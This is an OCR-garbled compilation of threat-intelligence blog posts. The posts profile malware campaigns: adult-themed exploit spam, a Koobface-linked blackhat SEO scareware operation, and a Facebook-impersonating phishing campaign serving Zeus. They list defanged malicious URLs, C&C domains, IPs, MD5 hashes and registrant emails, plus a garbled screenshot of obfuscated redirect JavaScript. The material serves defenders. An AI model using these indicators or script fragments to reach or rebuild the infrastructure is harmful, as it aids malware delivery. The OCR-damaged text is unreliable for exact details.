post, updates, as, soon, as, new, developments, take, place. 


Related posts: 

[1]New Cybercrime-Friendly Service Offers Fake Documents and Bills on Demand 
[2]Cybercriminals Offer Fake/Fraudulent Press Documents Accreditation On Demand 
[3]Cybercriminals Offer High Quality Plastic U.S Driving Licenses/University ID Cards 
[4]Vendor of Scanned Fake IDs, Credit Cards and Utility Bills Targets the French Market Segment 


[5]Newly Launched ‘Scanned Fake Passports/IDs/Credit Cards/Utility Bills’ Service Ran- 
domizes and Generates Unique Fakes On The Fly 


[6]A Peek Inside the Russian Underground Market for Fake Documents/IDs/Passports 


ttp://ddanchev. blogspot .com/2016/08/new- service-offers-fake-documents-and.htm 
ttp://ddanchev.blogspot.com/2016/08/cybercriminals-offer-fakefraudulent .htm 


ttp://ddanchev.blogspot.com/2013/08/cybercriminals-offer-high-quality.htm 


ttp://ddanchev.blogspot.com/2013/07/newly-1launched-scanned- fake. htm 
ttp://ddanchev.blogspot.com/2013/07/newly-1launched-scanned- fake. htm 


1. 
2. 
3. 
4. http://ddanchev. blogspot . com/2013/08/vendor-of-scanned-fake-ids-credit-cards.htm 
D: 
6. 


12.6.2 Historical OSINT - Spamvertised Client-Side Exploits Serving Adult Content 
Themed Campaign (2016-12-23 06:47) 


There’s no such thing as free porn, unless there are client-side, exploits, served. 


We've, recently, intercepted, a, currently, circulating, malicious, spam, campaign, entic- 
ing, end, users, into, clicking, on, malware-serving, client-side, exploits, embedded, content, 
for, the, purpose, of, affecting, a, socially, engineered, user”s, host, further, monetizing, 
access, by, participating, in, a, rogue, affiliate-network, based, type, of, monetizing, scheme. 


In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, 
the, cybercriminals, behind, it. 
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Sample, malicious, URL, known, to, have, participated, in, the, campaign: 

hxxp://jfkweb.chez.com/HytucztXRs.html? -> hxxp://aboutg.dothome.co.kr/bbs/theme 
_1 _1 _l.php -> _ http://aboutg.dothome.co.kr/bbs/theme _1 _1 _1.php?s=hvqCgoLEl 
&id=6 -> http://aboutg.dothome.co.kr/bbs/theme _1 _1 _1.php?s=hvqCgoLEl Sid=14 - 


> hxxp://meganxoxo.com - 74.222.13.2 - associated, name, servers: ns1.tube310.info; 
ns2.tube310.info - 74.222.13.24 


Parked there (74.222.13.2) are also: 
hxxp://e-leaderz.com - Email: seoproinc@gmail.com 
hxxp://babes4you.info - 74.222.13.25 
hxxp://tubexxxx.info 


hxxp://my-daddy.info - 74.222.13.25 


Related, malicious, URLs, known, to, have, participated, in, the, campaign: 
hxxp://eroticahaeven.info 

hxxp://freehotbabes.info 

hxxp://freepornportal.info 

hxxp://hot-babez.info 

hxxp://sex-sexo.info 

hxxp://tube310.info 


hxxp://tube323.info 


The exploitation structure is as follows: 


hxxp://meganxoxo.com/xox/go.php?sid=6 -> hxxp://kibristkd.org.tr/hasan-ikizer/index0O1.php 
-> hxxp://fd1a234sa.com/js - 79.135.152.26 -> hxxp://asf356ydc.com/qual/index.php - CVE- 
2008-2992; CVE-2009-0927; CVE-2010-0886 -> hxxp://asf356ydc.com/qual/52472f502b9688 
d3326a32ed5ddd5d2c.js -> hxxp://asf356ydc.com/qual/abe9c321312b20- 
6bffa798ef9d5b6a9b.php?uid=206 369 -> hxxp://188.243.231.39/public/qual.jar — - 
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> hxxp://asf356ydc.com/qual/load.php/0a3584217553d6fccbd74cfb73e954b6?fo 
rum=thread _id -> hxxp://asf356ydc.com/download/stat. php -> 
hxxp://asf356ydc.com/download/load/load.exe 


Related, malicious, URLs, known, to, have, participated, in, the, campaign: 
hxxp://jfkweb.chez.com/frank4.html - CVE-2010-0886 

- hxxp://jfkweb.chez.com/bud2.html 

- hxxp://jfkweb.chez.com/4.html 

- hxxp://wemhkr3t4z.com/qual/load/myexebr.exe 

- hxxp://asf356ydc.com/download/index.php 

- hxxp://89.248.111.71/qual/load.php?forum=jxp &ql 


- hxxp://asf356ydc.com/qual/index.php 


Related, malicious, URIs, known, to, have, participated, in, the, campaign: 
hxxp://qual/10964108e3afab081ed1986cde437202./js 
hxxp://qual/768a83ea36dbd09f995a97c99780d63e.php?spn=2 &uid=213393 & 


hxxp://qual/index.php?browser _version=6.0 &uid=213393 &browser=MSIE &spn=2 


Related, malicious, URLs, known, to, have, participated, in, the, campaign: 
hxxp://download/banner.php?spl=javat 
hxxp://download/j1 _ke.jar 


hxxp://download/j2 _93.jar 


parked on 89.248.111.71, AS45001, Interdominios _ono Grupo Interdominios S.A. 


wemhkr3t4z.com - Email: fole@fox.net - MD5: 3b375fc53207e1f54504d4b038d9fe6b 
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Related, malicious, MD5s, known, to, have, participated, in, the, campaign: 
hxxp://alhatester.com/cp/file.exe 
- 204.11.56.48; 204.11.56.45; 8.5.1.46; 208.73.211.230; 208.73.211.247; 


208.73.211.249; 208.73.211.246; 208.73.211.233; 208.73.211.238; 
208.73.211.208 


Known, to, have, phoned, back, to, the, same, malicious, C &C, server, IPs, are, also, 
the, following, malicious, MD5s: 


MD5: 89fb419120d1443e86d37190c8f42ae8 
MD5: 3194e6282b2e51led4ef186ce6125ed73 
MD5: 7f42da8b0f8542a55e5560e86c4df407 
MD5: f8bdc841214ae680a755b2654995895e 


MD5: ed8062e152ccbe14541d50210f035299 


eae a, sample, malware (MD5: 89fb419120d1443e86d37190c8f42ae8), 
phones, back, to, the, following, C &C, server, IPs: 

hxxp://gremser.eu 

hxxp://bibliotecacenamec.org.ve 

hxxp://fopeintures.com 

hxxp://postgil.com 

hxxp://verum1.home.pl 

hxxp://przedwislocze.internetdsl. pl 

hxxp://iskurders.webkursu.net 

hxxp://pennthaicafe.com.au 


hxxp://motherengineering.com 


hxxp://krupoonsak.com 
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est a, sample, malware (MD5: 3194e6282b2e5led4ef186ce6125ed73), 
phones, back, to, the, following, malicious, C &C, server, IPs: 
hxxp://get.enomenalco.club 

hxxp://promos-back.peerdlgo.info 

hxxp://get.cdzhugashvili.bid 

hxxp://doap.ctagonallygran.bid 

hxxp://get.gunnightmar.club 


hxxp://huh.adowableunco.bid 


hxxp://slibby.ineddramatiseo.bid 


ay a, sample, malware (MD5: 7f42da8b0f8542a55e5560e86c4df407), 
phones, back, to, the, following, malicious, C &C, server, IPs: 
hxxp://acemoglusucuklari.com.tr 

hxxp://a-bring.com 

hxxp://tn69abi.com 

hxxp://gim8. pl 


hxxp://sso.anbtr.com 


aes a, sample, malware (MD5: f8bdc841214ae680a755b2654995895e), 
phones, back, to, the, following, malicious, C &C, server, IPs: 
hxxp://dtrack.secdls.com 

hxxp://api.v2.secdls.com 

hxxp://api.v2.sslsecurel.com 


hxxp://api.v2.sslsecure2.com 


hxxp://api.v2.sslsecure3.com 
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hxxp://api.v2.sslsecure4.com 
hxxp://api.v2.sslsecure5.com 
hxxp://api.v2.sslsecure6.com 
hxxp://api.v2.sslsecure7.com 


hxxp://api.v2.sslsecure8.com 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://v00d00.org/nod32/grabber.exe - - 67.215.238.77; 67.215.255.139; 184.168.221.87 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, C &C, server, 
IPs (67.215.238.77): 


MD5: 1233c86d3ab0081b69977dbc92f238d0 


Known, to, have, responded, to, the, same, malicious, IPs, are, also, the, following, 
malicious, domains: 


hxxp://blog.symantecservice37.com 
hxxp://agoogle.in 
hxxp://adv.antivirup.com 


hxxp://cdind.antivirup.com 


Once, executed, a, sample, malware, phones, back, to, the, following, C &C, server, 
IPs: 


hxxp://v00d00.org/nod32/update.php 


Known, to, have, responded, to, the, same, malicious, IPs (67.215.255.139), are, also, 
the, following, malicious, domains: 


hxxp://lenovoserve.trickip.net 
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hxxp://proxy.wikaba.com 
hxxp://think.jkub.com 
hxxp://upgrate.freeddns.com 
hxxp://webproxy.sendsmtp.com 
hxxp://yote.dellyou.com 
hxxp://lostself.dyndns.info 
hxxp://dellyou.com 
hxxp://mtftp.freetcp.com 
hxxp://ftp.adobe.acmetoy.com 
hxxp://timeout.myvnc.com 


hxxp://fashion.servehalflife.com 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (67.215.255.139): 


MD5: e76aa56b5ba3474dda78bf31lebfle6c0 
MD5: 4de5540e450e3e18a05 7f95d20e3d6f6 
MD5: 346a605c60557e22bf3f29a61df7cd21 
MD5: ae9fefda2c6d39bclcec36cdf6cle6c4 


MD5: da84f1d6c021b55b25ead22aae79f599 


Known, to, have, responded, to, the, same, malicious, C &C, server, IPs (184.168.221.87), 
are, also, the, following, malicious, domains: 


hxxp://teltrucking.com 
hxxp://capecoraldining.org 
hxxp://carsforsaletoronto.com 


hxxp://joeyboca.com 
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hxxp://meeraamacids.com 
hxxp://orangepotus.com 
hxxp://palmerhardware.com 


hxxp://railroadtohell.com 


Related, malicious, MD5s, known, to, have, phoned, back, the, same, malicious, C &C, 
server, IPs (184.168.221.87):MD5: 037f8120323f2ddff3c806185512538c 


MD5: 44f0e8fe53a3b489cb5204701fa1773d 
MD5: 8a053e8d3e2eafc27be9738674d4d5b0 
MD5: 9efc79cd75d23070735da219c331fe4d 


MD5: ed81b9f1b72e31df1040ccaf9ed4393f 


Once, executed, a, sample, malware (MD5: 037f8120323f2ddff3c806185512538c), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://porno-kuba.net/emo/ld.php?v=1 &rs=1819847107 &n=1 &uid=1 


Once, executed, a, sample, malware, (MD5: 44f0e8fe53a3b489cb5204701fa1773d), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://mhc.ir 
hxxp://naphooclub.com 
hxxp://mdesigner.ir 
hxxp://nazarcafe.com 
hxxp://meandlove.com 
hxxp://nakhonsawangames.com 
hxxp://mevlanacicek.com 


hxxp://meeraprabhu.com 
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hxxp://micr.ae 
hxxp://myhyderabadads.com 


hxxp://cup-muangsuang.net 


Sample, malicious, URLs, known, to, have, participated, in, the, campaign: 
hxxp://portinilwo.com/nhjq/n09230945.asp 

- hxxp://portinilwo.com/botpanel/sell2.jpg 

- hxxp://portinilwo.com/boty.dat 

- hxxp://91.188.60.161/botpanel/sell2.jpg 


- hxxp://91.188.60.161/botpanel/ip.php 


Once, executed, a, sample, malware, phones, back, to, the, following, C &C, server, 
IPs: 


asf356ydc.com - MD5: 3b375fc53207e1f54504d4b038d9fe6b 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
asf356ydc.co 
kaljv63s.com 


sadkajt357.com 


We'll, continue, monitoring, the, fraudulent, infrastructure, and, post, updates, as, soon, 
as, new, developments, take, place. 


12.6.3 Historical OSINT - Celebrity-Themed Blackhat SEO Campaign Serving Scare- 
ware and the Koobface Botnet Connection (2016-12-23 08:02) 


In, a, cybercrime, dominated, by, fraudulent, propositions, historical, OSINT, remains, a, 
crucial, part, in, the, process, of, obtaining, actionable. intelligence, further, expanding, a, 
fraudulent, infrastructure, for, the, purpose, of, establishing, a, direct, connection, with, the, 
individuals, behind, it. Largely, relying, on, a, set, of, tactics, techniques, and, procedures, 
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cybercriminals, continue, further, expanding, their, fraudulent, infrastructure, successfully, 
affecting, hunreds, of, thousands, of, users, globally, further, earning, fraudulent, revenue, in, 
the, process, of, committing, fraudulent, activity, for, the, purpose, of, earning, fraudulent, 
revenue, in, the, process. 


In, this, post, we'll, discuss, a, black, hat, SEO (search engine optimization), campaign, 
intercepted, in, 2009, provide, actionable, intelligence, on, the, infrastructure, behind, it, and, 
discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercriminals, behind, it, 
successfully, establishing, a, direct, connection, with, the, Koobface, gang. 


Google images Ebn Nordegren Seach images 1 ane wes rece Seer 


SafeSearch OF + 


images @ Show cetions Resutts 1 - 18 of about 34,100 (0.04 sec: 


~ 
Tiger Woods & Elin Elin Nordegren Elin Nordegren acd Sees Her Elin 


resesGeversty Com patetans com bttlesanoud com holylace.com 


Elin Nordegren Elin Nordegren 


wife model Elin 


Elin Nordegren and elin nordegren 


zmbie.com hogwikd net stupeckelebrives net béttenanddound com pedagogic info 


The, Koobface, gang, having, successfully, suffered, a, major, take, down, efforts, thanks, to, 
active, community, and, ISP (Internet Service Provider), cooperation, has, managed, to, suc- 
cessfully, affect, a, major, proportion, of, major, social, media, Web, sites, including, Facebook, 
and, Twitter, for, the, purpose, of, further, spreading, the, malicious, software, served, by, 
the, Koobface, gang, while, earning, fraudulent, revenue, in, the, process, of, monetizing, the, 
hijacked, and, acquired, traffic, largely, relying, on, the, use, of, fake, security, software, and, 
the, reliance, on, a, fraudulent, affiliate-network, based, type, of, monetizing, scheme. 
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Elin Nordengren 


Woods Wife Elin Nordegren 


Een Naked 
Ebn Needearen Been 


© Ein Nordegren Photos 
© oseghun Nordegren 
© Een fide 


© Ein Tiger Weeds 


Largely, relying, on, a, diverse, set, of, traffic, acquisition, tactics, including, social, me- 
dia, propagation, black, hat, SEO (search engine optimization), and, client-side, exploits, the, 
Koobface, gang, has, managed, to, successfully, affect, hundreds, of, thousands, of, users, 
globally, successfully, populating, social, media, networks, such, as, Facebook, and, Twitter, 
with, rogue, and, bogus, content, for, the, purpose, of, spreading, malicious, software, and, 
earning, fraudulent, revenue, in, the, process, largely, relying, on, a, diverse, set, of, traffic, 
acquisition, tactics, successfully, monetizing, the, hijacked, and, acquired, traffic, largely, 
relying, on, the, use, of, affiliate-network, based, traffic, monetizing, scheme. 


Let’s, profile, the, campaign, provide, actionable, intelligence, on, the, infrastructure, be- 
hind, it, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercriminals, 
behind, it, and, establish, a, direct, connection, with, the, Koobface, gang, and, the, Koobface, 
botnet’s, infrastructure. 
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Sample URL, redirection, chain: 


hxxp://flash.grywebowe.com/elin5885/?x=entry:entry091109-071901 : - 
> http://alicia-witt.com/elin1619/?x=entry:entry091112-185912 -> 
hxxp.://indiansoftwareworld.com/index.php?affid=31700 - 213.163.89.56 


<html> 
LABEL cooEC 

<head> 
<title>Loading</title> 
nota name="robots” content="noindex, nofollow, noarchive™> 
<scritpt> 

umation handleErcor() (try( vindow, parent. location=h 
it (wa ¥. parent . frames. length>0) (if (window. parent, 
</script> 


tions catch (e) () tryl window, top. location= location: } catch (e) ()) vindow.onerror=handleError: 
wrent .body. inner BTL) ¢ 


window.ieIE = true; function meieversion() ( var us = window.navigator-areragent: var meie = 
(msie > 0) retern pareeInt (us.eubetring(mete + 5, - 3 return O- vindow. version = meteversion(}: ) 
> v (ede { 42 (window.isI£E) { if (window, IEversion < 6} ) else ({ try 
«QecE Lement ile’). LaunchUPL (edr): ) V { lowation. heeft * adr; 
fus ion exiterc(){ anger Vindow (window. location er): ov idangerVindidr); return false: } 
if (window.attach£vest) eval (“window.atteachvent (‘onumioad’,exiter):*): else window. addfventListener (*unload", exiter, false): 
’ 
</aertpt> 
<ucript type="text/javarcript">document.write("<O80'+' ECT ad="1"+' te" width="0" heig * style="positionz:abeolute; teft:O;top:0;" 


CLAS’ +! SID="CLS’ + 1D: ORF’ +* SEA" + 52-99 +°d3-BL59-OOCO4F’ + TOF AAC” type-"applica 
NANE=*fen' +' dP Laydcatecha’ + ngeEven ALUE="True"> <PA'+' RAN NANE="Au' ¢' todt’ +’ arc 
nane-*Play’+'Count* value="9999"></ }2</soript> 

<script Language" )javaseript">AC_FL_ BusContent * 0: </seript> 

<script Language" )avareript™> 


x-ole’+'obje'+'ct™> <PA'+' RAR 
VE+"True"> <PAR' +" AN name="willo'+'de" value="none"> <PA'+' RAE 


var istf © (navigator appVersion. imdexOf ("MSIE") (* <2) ? true : false: 

var t2¥in = (navigator.appVersion.toLowerCase().indexOf("vin") [= <1) ? true : false: 
var i20pera = (navigator.uperAgent.imdexOf ("Opera") '* -3) ? true : false; 

function ControlVersion() ( 


var version: 

var axo! 

var e: 

try 
axo * mew ActivextObject (Shockwave! tash.Shockvavel iash.7*) : 
version = axo.GetVartabie("fversion™); 

> catch (fe) 1) 

it ('version) { 
tee 


> 
version * axo.GetVariable("*tverzion™) : 


Sample, detection, rate, for, a, malicious, executable:MD5: 
bd7419a376f9526719d4251a5dab9465 


Sample, URL, redirection, chain, leading, to, client-side, exploits: 


hxxp://loomoom.in/counterjs - 64.20.53.84 - the front page says "We are under DDOS 
attack. Try later". 


hxxp.://firefoxfowner.cn/?pid=101s06 &sid=977111 -> hxxp://royalsecurescana.com/scan1/?pid=1- 
01s6 &engine=p3T41jTuOTYZLjE3Ny4xNTMmdGItZTOxMjUxNMkKNPAhN 
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Sample, detection, rate, for, a, malicious, executable: 


MD5: a91a1lbb995e999f2 7ffc5d9aa0ac2ba2 


Once, executed, a, sample, malware, phones, back, to: 


hxxp://systemcoreupdate.com/download/timesroman. tif - 213.136.83.234 


Request Headers 


= Client 
Accept: application)iaml, application) xchtml+ cml, text/himl;q=0.9,text/plsin;q=0.8,image/png,*/*;q=0.S 
Accept-Charset: ISO-8859-1 ,utf-8;q=0.7,";q=0.3 
Accept-Encoding: gzip, deflate 
Accept-Language: 
User-Agent: 
= Transport 
Connection: keep-alive 
Host: com 


Transformer Headers  TextView | SyrtaxView  ImageView HexView  WebView Auth Caching Privacy Row XML 


1 var host *1040116111621123058404750476115709980979114012110452115309940975114612170468099911000471" ; 
2 var pid *58s06'; 
3 var sid *9£93be'> 


4 
5 fumetion GNT(G) { 

6 function sWHiJ) | 
7 

3 


var x = new Array (Math. ceil(J. length 4 
for (var © Ort x. length; ttt) | 


3 x{[t) J.charCodeAt (t * 4) + (J.charCodeAt(t * 4 + 1) 8) + (J.charCodeAt(t * 4 + 2 16) + (J. char 
10 h 

il return x; 

i2 } 

43 function LLZ(x) { 

i4 var k = new Array(x. length) ; 

as for (var t = O: t x. length: ttt) | 

16 k(t) © String. fromCharCode(x(t} 4 285, x(t) 8 6 288, xit 16 6 288, x(t} 24 «4 288); 

i7 } 

18 return k.join(""); 

i3 } 

20 function wVEIJ) ¢ 

21 return J replace(/!\d\d?\d?'/g, 

22 function(e) { 

23 return String. fromCharCode(c.slice(l. <1)); v 
< > 


Sample, URL, redirection, chain: 


hxxp://oppp.in/counterjs - 64.20.53.83 - the same message is also left "We are under 
DDOS attack. Try later" 


hxxp://johnsmith.in/counterjs - 64.20.53.86 
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hxxp://gamotoe.in/counter.js 
hxxp://polofogoma.in/counter.js 
hxxp://jajabin.in/counter js 
hxxp://dahaloho.in/counter.js 
hxxp://gokreman.in/counter.js 
hxxp.://freeblogcounter2.com/counter.js 
hxxp://lahhangar.in/counterjs 
hxxp://galorobap.in/counter js 


Sample, directory, structure, for, the, black, hat, SEO (search engine optimization), 
campaign: 
hxxp.://images/include/bmblog 
hxxp://bmblog/category/art/ 
hxxp://images/style/bmblog 
hxxp://photos/archive/bmblog/ 
hxxp://templates/img/bmblog 
hxxp://phpsessions/bmblog 
hxxp://Index _archivos/img/bmblog/ 
hxxp://bmblog/category/hahahahahah/ 
hxxp://gallery/include/bmblog 


Sample, malicious, domains, participating, in, the, campaign: 
pcmedicalbilling.com - Email: sophiawrobertson@pookmail.com 
securitytoolnow.com - Email: ronaldmpappas@dodgit.com 
securitytoolsclick.net - Email: ruthdtrafton@dodgit.com 


security-utility.net - Email: richardrmccullough@trashymail.com 


Historically on the same IP were parked the following, now responding to 91.212.107.37 
domains: 


online-spyware-remover.biz - Email: robertsimonkroon@gmail.com 
online-spyware-remover.info - Email: robertsimonkroon@gmail.com 
spyware-online-remover.biz - Email: robertsimonkroon@gmail.com 
spyware-online-remover.com - Email: robertsimonkroon@gmail.com 


spyware-online-remover.info - Email: robertsimonkroon@gmail.com 
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spyware-online-remover.net - Email: robertsimonkroon@gmail.com 
spyware-online-remover.org - Email: robertsimonkroon@gmail.com 
tubepornonline.biz - Email: robertsimonkroon@gmail.com 


tubepornonline.org - Email: robertsimonkroon@gmail.com 


mail.newsecuritytools.net 
mail.securityttoolnow.com 
newsecuritytools.net 
ns1.securitytoolnow.com 
online-spyware-remover.biz 
online-spyware-remover.into 
pemedicalbilling.com 


securitytoolnow.com . 4 . 78,129.128,0/17 ———4S-ge as29131 


78.129.166.11 


spyware-online-remover.biz / bod11 i0waterford.net 


spyware-online-remover.com 
spyware-online-remover.info 
spyware-online-remover.net 
spyware-online-remover.org 
tubepornoniine.biz 
tubepornoniine.org 


www. newsecuritytools.net 
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Sample, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://antyspywarestore.com/index.php?affid=90400 


hxxp://newsecuritytools.net/index.php?affid=90400 - 78.129.166.11 - Email: joyomcder- 
mott@gmail.com 


Sample, detection, rate, for, a, malicious, executable: 
MD5: Ofeffd97ffe3ecc875cfe44b73f5653b 


MD5: a0d9d3127509272369f05c94ab2acfc9 


Naturally, it gets even more interesting, in particular the fact the very same robertsi- 
monkroon@gmail.com used to register the domains historically parked at the IP that is 
currently hosting the scareware domains part of the massive blackhat SEO campaign - the 
very same domains (hxxp://firefoxfowner.cn), were also in circulation on Koobface infected 
host, in a similar fashion when the domains used in the New York Times malvertising campaign 
were simultaneously used in blackhat SEO campaigns managed by the Koobface gang - have 
not only been seen in July’s scareware campaigns - but also, has been used to register actual 
domains used as a download locations for the scareware campaigns part of the [1]Koobface 
botnet’s scareware business model. 
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en, 
video 
santwate 


ttytume ie ade of Oow 


Download software 


What people say? Features 


Parked, at, the, same, malicious, IP (91.212.107.37), are, also, the, following, malicious, 
domains: 


hxxp://free-web-download.com 
hxxp://web-free-download.com 
hxxp://iqmediamanager.com 
hxxp://oesoft.eu 
hxxp://unsoft.eu 
hxxp://losoft.eu 
hxxp://tosoft.eu 


hxxp://kusoft.eu 
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Sample, detection, rate, for, a, malicious, executable: 
MD5: 29ff816c7e11147bb74570c28c4e6103 
MD5: e59b66eb1680c4f195018b85e6d8b32b 


MD5: b34593d884a0bc7a5adb7ab9d3b19a2c 


The overwhelming evidence of underground multi-tasking performed by the Koobface 
gang, it’s connections to money mule recruitment scams, high profile malvertising attacks, 
and current market share leader in blackhat SEO campaigns, made, the, group, a, prominent, 
market, leader, within, the, cybercrime, ecosystem, having, successfully, affecting, hundreds, 
of, thousands, of, users, globally, potentially, earning, hundreds, of, thousands, in, fraudulent, 
revenue, in, the, process. 


Related posts: 

[2]The Koobface Gang Wishes the Industry "Happy Holidays" 
[3]Koobface Gang Responds to the "10 Things You Didn’t Know About the Koobface Gang Post" 
[4]How the Koobface Gang Monetizes Mac OS X Traffic 

[5]Koobface Botnet’s Scareware Business Model - Part Two 
[6]Koobface Botnet’s Scareware Business Model 

[7]From the Koobface Gang with Scareware Serving Compromised Site 
[8]Koobface Botnet Starts Serving Client-Side Exploits 
[9]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[10]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
[11]Koobface - Come Out, Come Out, Wherever You Are 
[12]Dissecting Koobface Worm’s Twitter Campaign 

[13]Koobface Botnet Redirects Facebook’s IP Space to my Blog 


[14]Koobface Botnet Dissected in a TrendMicro Report 
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[15]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[16]Movement on the Koobface Front - Part Two 

[17]Movement on the Koobface Front 

[18]Dissecting the Koobface Worm’s December Campaign 

[19]The Koobface Gang Mixing Social Engineering Vectors 


[20]Dissecting the Latest Koobface Facebook Campaign 


1. http: //ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business.htm 

2. http: //ddanchev blogspot . com/2009/12/koobface- gang-wishes~industry-happy . htm] 

3, seg //asancuey Slopsost coa/2010 00 /nosotace pang: reopens te 10 tulngs you XG 
4. http://ddanchev. blogspot . com/2010/02/how-koobface-gang-monetizes-mac-os-x.htm 

5. http://ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business.htm 

6. http: //ddanchev . blogspot . com/2009/09/koobface-botnets-scareware-business html 

7 ee //aeneuey.slepeose coa/2010(00/ ace: cooktece_ cue vie searvnre 

8. http: //ddanchev. blogspot . com/2009/11/koobface-botnet-starts-serving-client.htm 

9. http: //ddanchev. blogspot . com/2009/12/koobface-friendly-riccom-1td-as29550.htm 


10. http://ddanchev. blogspot .com/2010/04/dissect ing-koobface-gangs-latest .htm 


11. http://ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter.htm 
12. http://ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter.htm 
13. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
14. http://ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 


15. http://ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
16. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front-part-two.htm 


17. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front.htm 


18. http://ddanchev. blogspot .com/2008/12/dissect ing-koobface-worms-december .htm 


19. http://ddanchev. blogspot .com/2008/12/koobface-gang-mixing-social-engineering. html 


20. http: //ddanchev. blogspot . com/2008/11/dissecting-latest-koobface- facebook .htm 
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12.6.4 Historical OSINT - Zeus and Client-Side Exploit Serving Facebook Phishing 
Campaign Spotted in the Wild (2016-12-23 11:29) 


In, a, cybercrime, ecosystem, dominated, by, fraudulent, propositions, cybercrimianals, con- 
tinue, actively, populating, their, botnet’s, infected, population, with, hundreds, of, thousands, 
of, newly, affected, users, globally, potentially, compromising, the, confidentiality, integrity, 
and, availability, of, the, affected, hosts, to, a, multi-tude, of, malicious, software, further, 
earning, fraudulent, revenue, in, the, process, of, monetizing, the, affected, botnet’s, popu- 
lation, largely, relying, on, the, utilization, of, affiliate-based, type, of, fraudulent, revenue, 
monetization, scheme. 


We've, recently, intercepted, a, currently, circulating, malicious, spam, Campaign, imper- 
sonating, Facebook, for, the, purpose, of, serving, client-side, exploits, to, socially, engineered, 
users, further, compromising, the, confidentiality, integrity, and, availability, of, the, affected, 
hosts, to, a, multi-tude, of, malicious, software, further, earning, fraudulent, revenue, in, the, 
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process, of, monetizing, the, affected, hosts, largely, relying, on, the, use, of, affiliate-based, 
type, of, fraudulent, revenue, monetizing, scheme. 


In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind it, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind, it, and, provide, actionable, intelligence, on, the, infrastructure, 
behind, it. 


Sample, URL, exploitation, chain: 
hxxp://auth.facebook.com.megavids.org/id735rp/LoginFacebook.php 
- hxxp://wqdfr.salefale.com/index.php - 62.193.127.197 


- hxxp://spain.salefale.com/index.php 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://salefale.com - 112.137.165.114 


- hxxp://countrtds.ru - 91.201.196.102 - Email: thru@freenetbox.ru 


Sample, detection, rate, for, the, malicious, executable: 
MD5: e96c8d23e3b64d79e5e134a9633d6077 


MD5: 19d9cc4d9d512e60f61746ef4c741f09 


Once, executed, a, sample, malware, phones back to: 


hxxp://makotoro.com 


Related, malicious, C &C, server, IPs, known, to, have, participated, in, the, campaign: 
hxxp://91.201.196.99 


hxxp://91.201.196.77 
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hxxp://91.201.196.101 
hxxp://91.201.196.35 
hxxp://91.201.196.75 
hxxp://91.201.196.76 
hxxp://91.201.196.38 
hxxp://91.201.196.34 


hxxp://91.201.196.37 


Related, malicious, C &C, server, IPs (212.175.173.88), known, to, have, participated, 
in, the, campaign: 


hxxp://downloads.fileserversa.org 
hxxp://downloads.fileserversc.org 
hxxp://downloads.fileserversd.org 
hxxp://downloads.portodrive.org 
hxxp://downloads.fileserversj.org 
hxxp://downloads.fileserversk.org 
hxxp://downloads.fileserversm.org 
hxxp://downloads.fileserversn.org 
hxxp://downloads.fileserverso.org 
hxxp://downloads.fileserversq.org 
hxxp://downloads.fileserversr.org 
hxxp://auth.facebook.com.megavids.org 
hxxp://auth.facebook.com.fileserversl.com 
hxxp://auth.facebook.com.legomay.com 
hxxp://auth.facebook.com.crymyway.com 


hxxp://auth.facebook.com.portodrive.net 
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hxxp://auth.facebook.com.modavedis.net 
hxxp://auth.facebook.com.migpix.net 
hxxp://auth.facebook.com.legomay.net 
hxxp://auth.facebook.com.crymyway.net 
hxxp://downloads.megavids.org 
hxxp://downloads.regzavids.org 
hxxp://downloads.vedivids.org 
hxxp://downloads.restpictures.org 
hxxp://downloads.modavedis.org 
hxxp://downloads.fileserverst.org 
hxxp://downloads.fileserversu.org 
hxxp://downloads.regzapix.org 
hxxp://downloads.reggiepix.org 
hxxp://downloads.migpix.org 
hxxp://downloads.restopix.org 
hxxp://downloads.legomay.org 
hxxp://downloads.vediway.org 
hxxp://downloads.compoway.org 
hxxp://downloads.restway.org 
hxxp://downloads.crymyway.org 
hxxp://downloads.fileserversa.com 
hxxp://downloads.fileserversb.com 
hxxp://downloads.fileserversc.com 
hxxp://downloads.fileserversd.com 


hxxp://downloads.fileserverse.com 
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hxxp://downloads.fileserversf.com 
hxxp://downloads.fileserversg.com 
hxxp://downloads.fileserversh.com 
hxxp://downloads.fileserversi.com 
hxxp://downloads.fileserversj.com 
hxxp://downloads.fileserversk.com 
hxxp://downloads.fileserversl.com 
hxxp://downloads.fileserversm.com 
hxxp://downloads.fileserversn.com 
hxxp://downloads.fileserverso.com 
hxxp://downloads.fileserversp.com 
hxxp://downloads.fileserversq.com 
hxxp://downloads.fileserversr.com 
hxxp://downloads.regzavids.com 
hxxp://downloads.vedivids.com 
hxxp://downloads.restpictures.com 
hxxp://downloads.modavedis.com 
hxxp://downloads.fileserverss.com 
hxxp://downloads.fileserverst.com 
hxxp://downloads.fileserversu.com 
hxxp://downloads.regzapix.com 
hxxp://downloads.reggiepix.com 
hxxp://downloads.migpix.com 
hxxp://downloads.legomay.com 


hxxp://downloads.vediway.com 


5437 


hxxp://downloads.compoway.com 
